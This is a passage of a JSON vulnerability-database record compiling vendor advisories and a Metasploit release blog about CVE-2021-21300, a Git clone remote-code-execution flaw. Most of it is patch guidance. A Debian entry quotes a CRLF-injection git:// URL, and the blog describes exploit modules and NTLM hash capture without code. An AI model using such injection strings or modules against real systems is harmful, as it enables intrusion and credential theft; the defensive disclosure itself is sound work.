(CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data| 4.0.0 - 4.5.0 \n \n \n\n\n## Remediation/Fixes\n\nIBM recommends addressing the vulnerability now by upgrading. \n\nProduct(s)| Version(s) \n| Remediation/Fix/Instructions \n---|---|--- \nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data| 4.5.1| The fix in 4.5.1 applies to all versions listed (4.0.0-4.5.0). Version 4.5.1 can be downloaded and installed from: \n[https://www.ibm.com/docs/en/cloud-pa](<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.5.x?topic=installing>)[ks/cp-data/4.5.x?topic=installing](<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.5.x?topic=installing>) \n \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-01-12T21:59:00", "type": "ibm", "title": "Security Bulletin: IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is vulnerable to arbitrary code execution in MS Visual Studio (CVE-2021-21300).", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2023-01-12T21:59:00", "id": "73690528940837ED9F5E1C09C8B135FBAA2F8C5262BEEE48AC6C886A7FCEAFB0", "href": "https://www.ibm.com/support/pages/node/6610343", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-07-26T16:33:28", "description": "git is vulnerable to Remote Code Execution (RCE). Cloning a specially crafted repository which contains symbolic links as well as a clean/smudge filter such as Git LFS may cause just-checked out scripts to be executed onto a case-insensitive file system.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-10T07:05:50", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-05-05T16:47:20", "id": "VERACODE:29656", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29656/summary", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-12-07T00:36:41", "description": "Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are: 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6.", "cvss3": {}, "published": "2021-03-09T20:15:00", "type": "osv", "title": "CVE-2021-21300", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-21300"], "modified": "2022-12-07T00:36:38", "id": "OSV:CVE-2021-21300", "href": "https://osv.dev/vulnerability/CVE-2021-21300", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-13T00:16:23", "description": "\nSeveral security vulnerabilities have been discovered in Git, a fast, scalable,\ndistributed revision control system, which may affect multi-user systems.\n\n\n* [CVE-2021-21300](https://security-tracker.debian.org/tracker/CVE-2021-21300)\nA specially crafted repository that contains symbolic links as well as\n files using a clean/smudge filter such as Git LFS, may cause just-checked\n out script to be executed while cloning onto a case-insensitive file system\n such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and\n macOS).\n* [CVE-2021-40330](https://security-tracker.debian.org/tracker/CVE-2021-40330)\ngit\\_connect\\_git in connect.c allows a repository path to contain a newline\n character, which may result in unexpected cross-protocol requests, as\n demonstrated by the git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1\n substring.\n\n\nFor Debian 10 buster, these problems have been fixed in version\n1:2.20.1-2+deb10u4.\n\n\nWe recommend that you upgrade your git packages.\n\n\nFor the detailed security status of git please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/git>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-10-11T00:00:00", "type": "osv", "title": "git - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40330", "CVE-2021-21300"], "modified": "2022-10-13T00:16:20", "id": "OSV:DLA-3145-1", "href": "https://osv.dev/vulnerability/DLA-3145-1", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-03-21T06:07:08", "description": "Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are: 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T20:15:00", "type": "debiancve", "title": "CVE-2021-21300", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-09T20:15:00", "id": "DEBIANCVE:CVE-2021-21300", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21300", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2023-02-08T16:14:13", "description": "New git packages are available for Slackware 14.0, 14.1, 14.2, and -current to\nfix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/git-2.17.6-i586-1_slack14.2.txz: Upgraded.\n This update fixes a security issue:\n On case-insensitive file systems with support for symbolic links, if Git is\n configured globally to apply delay-capable clean/smudge filters (such as Git\n LFS), Git could be fooled into running remote code during a clone. Credit for\n finding and fixing this vulnerability goes to Matheus Tavares, helped by\n Johannes Schindelin.\n For more information, see:\n https://vulners.com/cve/CVE-2021-21300\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/git-2.17.6-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/git-2.17.6-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/git-2.17.6-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/git-2.17.6-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/git-2.17.6-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/git-2.17.6-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/git-2.30.2-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/git-2.30.2-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n695074b32e19ea8912c0c8e039d67246 git-2.17.6-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nbbfe4df0f55756aa087a22bf9d954638 git-2.17.6-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n1e1beb552691af0fbef2e9abf54923b5 git-2.17.6-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nfc4c9a40d1bdec42db0a5b4c5f9f1f8c git-2.17.6-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n024d8b9cf96d410e965ae2a097307ba1 git-2.17.6-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\na9ade9e3be9e54c4b459bbe9b030d9a5 git-2.17.6-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n04a6620183cffd3d59169184c63c826d d/git-2.30.2-i586-1.txz\n\nSlackware x86_64 -current package:\n8639968c64bac54ebb87e6d7ea2cff59 d/git-2.30.2-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg git-2.17.6-i586-1_slack14.2.txz", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-12T02:43:49", "type": "slackware", "title": "[slackware-security] git", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-12T02:43:49", "id": "SSA-2021-070-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2021&m=slackware-security.436701", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-11-09T22:03:15", "description": "An improper link resolution exists in the checkout mechanism of Git Source Code Management (git-scm) by Git. An out-of-order checkout triggered by a delayed checkout or checkout-index may result in an improper validation of a file resource type prior to performing a file write operation. A remote attacker can exploit this vulnerability by enticing a user to clone a malicious repository.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-09T00:00:00", "type": "checkpoint_advisories", "title": "Git Source Code Management Code Execution (CVE-2021-21300)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2022-11-09T00:00:00", "id": "CPAI-2021-1343", "href": "", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "apple": [{"lastseen": "2023-02-20T14:53:33", "description": "# About the security content of Xcode 12.5\n\nThis document describes the security content of Xcode 12.5.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Xcode 12.5\n\nReleased April 26, 2021\n\n**Git**\n\nAvailable for: macOS Big Sur 11 and later\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-21300: an anonymous researcher\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: April 26, 2021\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-26T00:00:00", "type": "apple", "title": "About the security content of Xcode 12.5", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-04-26T00:00:00", "id": "APPLE:A0585C210067431EE8E00DA73CF0ED0F", "href": "https://support.apple.com/kb/HT212320", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2023-02-24T14:58:49", "description": "-------------------------------------------------------------------------\nDebian LTS Advisory DLA-3145-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Markus Koschany\nOctober 11, 2022 https://wiki.debian.org/LTS\n-------------------------------------------------------------------------\n\nPackage : git\nVersion : 1:2.20.1-2+deb10u4\nCVE ID : CVE-2021-21300 CVE-2021-40330\nDebian Bug : 985120\n\nSeveral security vulnerabilities have been discovered in Git, a fast, scalable,\ndistributed revision control system, which may affect multi-user systems.\n\nCVE-2021-21300\n\n A specially crafted repository that contains symbolic links as well as\n files using a clean/smudge filter such as Git LFS, may cause just-checked\n out script to be executed while cloning onto a case-insensitive file system\n such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and\n macOS).\n\nCVE-2021-40330\n\n git_connect_git in connect.c allows a repository path to contain a newline\n character, which may result in unexpected cross-protocol requests, as\n demonstrated by the git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1\n substring.\n\n\nFor Debian 10 buster, these problems have been fixed in version\n1:2.20.1-2+deb10u4.\n\nWe recommend that you upgrade your git packages.\n\nFor the detailed security status of git please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/git\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\nAttachment:\nsignature.asc\nDescription: This is a digitally signed message part\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-10T22:16:21", "type": "debian", "title": "[SECURITY] [DLA 3145-1] git security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300", "CVE-2021-40330"], "modified": "2022-10-10T22:16:21", "id": "DEBIAN:DLA-3145-1:98F78", "href": "https://lists.debian.org/debian-lts-announce/2022/10/msg00014.html", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-09-03T16:57:40", "description": "## Capture Credentials with our new SMB Server\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/09/metasploit-ascii-1.png)\n\nOur own [Adam Galway](<https://github.com/agalway-r7>) revamped the old SMB capture [module](<https://github.com/rapid7/metasploit-framework/pull/15548>) and now supports NTLMv1 and NTLMv2, as well as SMB1, SMB2 and SMB3. This was possible thanks to [@zeroSteiner](<https://github.com/zeroSteiner>)'s new RubySMB server [implementation](<https://github.com/rapid7/ruby_smb/pull/177>). Metasploit is now able to capture NTLM hashes from any recent Windows releases using the SMB2 and SMB3 dialects, even with encrypted SMB traffic.\n\n## Revenge of the Clones\n\nEarlier this year, an outstanding vulnerability in Git clients was disclosed and identified as [CVE-2021-21300](<https://attackerkb.com/topics/GIyrDyWf9s/cve-2021-21300?referrer=blog>). It allows an attacker to execute scripts on the victim's system when cloning a specially crafted repository onto a case-insensitive file system such as NTFS, HFS+ or APFS. Our own [Shelby Pace](<https://github.com/space-r7>) just added a new exploit [module](<https://github.com/rapid7/metasploit-framework/pull/15532>) that leverages this flaw to achieve remote code execution. First, the module creates a fake Git repository and waits for the victim to clone it. This process will deliver a `post-checkout` script with the payload that will be automatically executed upon checkout of the repository.\n\nNote that for this exploit to work, the victim's Git client must support delay-capable clean / smudge filters and symbolic links. The former is enabled by default on Windows through `Git-lfs`.\n\nDon't clone repositories you don't trust!\n\n## Exploiting eBPF on Linux\n\nA new local exploit module that leverages a bug in the Linux eBPF feature was added by [Grant Willcox](<https://github.com/gwillcox-r7>) this week. This vulnerability is identified as [CVE-2021-3490](<https://attackerkb.com/topics/3D6SKZ2Hv2/cve-2021-3490?referrer=blog>) and allows a local attacker to achieve code execution as the root user by conducting an out-of-bounds read and write in the Linux kernel. This is possible due to a flaw in eBPF `verifier`'s verification of ALU32 operations. This module is based on [@chompie1337](<https://github.com/chompie1337>)'s [PoC](<https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490>) code and should work on any vulnerable kernel versions (from 5.7-rc1 prior to 5.13-rc4, 5.12.4, 5.11.21, and \n5.10.37). Note that, at the moment, it has only been tested on Ubuntu 20.04 (Focal Fossa) 5.8.x kernels prior to 5.8.0-53.60, Ubuntu 20.10 (Groovy Gorilla) 5.8.x kernels prior to 5.8.0-53.60, Ubuntu 21.04 (Hirsute Hippo) 5.11.x kernels prior to 5.11.0-17.18 and Fedora kernel versions 5.x from 5.7.x up to but not including 5.11.20-300. However, the module documentation includes some instructions for porting the exploit over onto other systems.\n\n## New module content (4)\n\n * [Geutebruck Multiple Remote Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15603>) by Ibrahim Ayadhi, S\u00e9bastien Charbonnier, and Titouan Lazard, which exploits [CVE-2021-33554](<https://attackerkb.com/topics/2pz1Pw3KSH/cve-2021-33554?referrer=blog>) \\- A new module has been added which bypasses authentication and exploits CVE-2021-33544, CVE-2021-33548, and CVE-2021-33550-33554 on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the `root` user.\n * [Linux eBPF ALU32 32-bit Invalid Bounds Tracking LPE](<https://github.com/rapid7/metasploit-framework/pull/15567>) by Grant Willcox, Manfred Paul, and chompie1337, which exploits ZDI-21-606 - This adds a module that uses @chompie1337's CVE-2021-3490 PoC code to elevate privileges to `root` on affected Linux systems. It's been tested to work on clean installs of Ubuntu 21.04, Ubuntu 20.10, Ubuntu 20.04.02, as well as Fedora running affected versions of the 5.7, 5.8, 5.9, 5.10 and 5.11 kernels.\n * [Git LFS Clone Command Exec](<https://github.com/rapid7/metasploit-framework/pull/15532>) by Johannes Schindelin, Matheus Tavares, and Shelby Pace, which exploits [CVE-2021-21300](<https://attackerkb.com/topics/GIyrDyWf9s/cve-2021-21300?referrer=blog>) \\- An exploit module has been added for CVE-2021-21300, a RCE vulnerability in affected Git clients that support delay-capable clean / smudge filters and symbolic links on case-insensitive file systems. Additionally, a set of mixins that aid in exploiting Git clients over the Smart HTTP protocol have been added into Metasploit and the code for older Git-related exploits has been updated to utilize some of this new code.\n * [Overhaul SMB auth capture server](<https://github.com/rapid7/metasploit-framework/pull/15548>) from [agalway-r7](<https://github.com/agalway-r7>) \\- This updates the SMB capture server to be compatible with clients using the SMB 2 and SMB 3 dialects. SMB 1 has not been enabled in Windows 10 since v1709 was released in 2017. This allows the module to be compatible with recent releases.\n\n## Enhancements and features\n\n * [#15253](<https://github.com/rapid7/metasploit-framework/pull/15253>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Updates Metasploit to support URI arguments to set module datastore values. The currently supported protocols are http, smb, mysql, postgres, and ssh.\n * [#15537](<https://github.com/rapid7/metasploit-framework/pull/15537>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds support for Ruby 3\n * [#15582](<https://github.com/rapid7/metasploit-framework/pull/15582>) from [bcoles](<https://github.com/bcoles>) \\- The code for `Msf::Post::Linux::Kernel.unprivileged_bpf_disabled?` has been updated to support new values supported by `kernel.unprivileged_bpf_disabled` which were introduced in Linux kernels since 5.13 and 5.14-rc+HEAD, particularly the value `2` which means `Unprivileged calls to bpf() are disabled`, whereas the value `1` is now used to indicate `Unprivileged calls to bpf() are disabled without recovery`\n * [#15606](<https://github.com/rapid7/metasploit-framework/pull/15606>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Improves Python Meterpreter to gracefully handle unsupported command ids, and cleaning up process objects correctly. Additionally enhances mingw build support for Windows Meterpreter, and now correctly interprets a transport session time of 0 as never expiring.\n * [#15621](<https://github.com/rapid7/metasploit-framework/pull/15621>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Updates the Metasploit docker container to additionally include Go as a dependency.\n * [#15623](<https://github.com/rapid7/metasploit-framework/pull/15623>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The `creds` command has been updated to support several new features: supporting formatting NetNTLMv1 and NetNTLMv2 hash for both the JtR and Hashcat formatters, filtering hashes based on the realm, not truncating hashes when writing them to a CSV file, filtering based on the JtR format type name, support for applying the same filtering to output files that can be applied when generating the `creds` table, and support for ensuring output consistency when writing output to a file.\n\n## Bugs fixed\n\n * [#15375](<https://github.com/rapid7/metasploit-framework/pull/15375>) from [HynekPetrak](<https://github.com/HynekPetrak>) \\- This PR fixes a bug whereby Metasploit would sometimes crash when remote LDAP servers returned a null character in the base_dn string, and also enhances `modules/auxiliary/gather/ldap_hashdump.rb` to handle sha256 hashes and skip hashes in cases of LK (locked account) and NP (no password) credentials.\n\n * [#15572](<https://github.com/rapid7/metasploit-framework/pull/15572>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This PR implements a fix to correctly handle quoted console options and whitespace\n\n * [#15573](<https://github.com/rapid7/metasploit-framework/pull/15573>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- The `simplify_module` function has been updated so that by default it will not load LHOST/RHOST from the config file and instead use the values set in the options.\n\n * [#15590](<https://github.com/rapid7/metasploit-framework/pull/15590>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- A bug has been fixed that prevented external modules from properly handling the encoding of UTF-8 characters.\n\n * [#15596](<https://github.com/rapid7/metasploit-framework/pull/15596>) from [tomadimitrie](<https://github.com/tomadimitrie>) \\- A bug has been fixed in `docker_credential_wincred` whereby the regex would sometimes match on IP addresses and other invalid entries instead of the expected Docker version string. This has now been fixed by tightening the regex to make it more specific and restrictive.\n\n * [#15628](<https://github.com/rapid7/metasploit-framework/pull/15628>) from [timwr](<https://github.com/timwr>) \\- Ensures the session table is refreshed whenever the 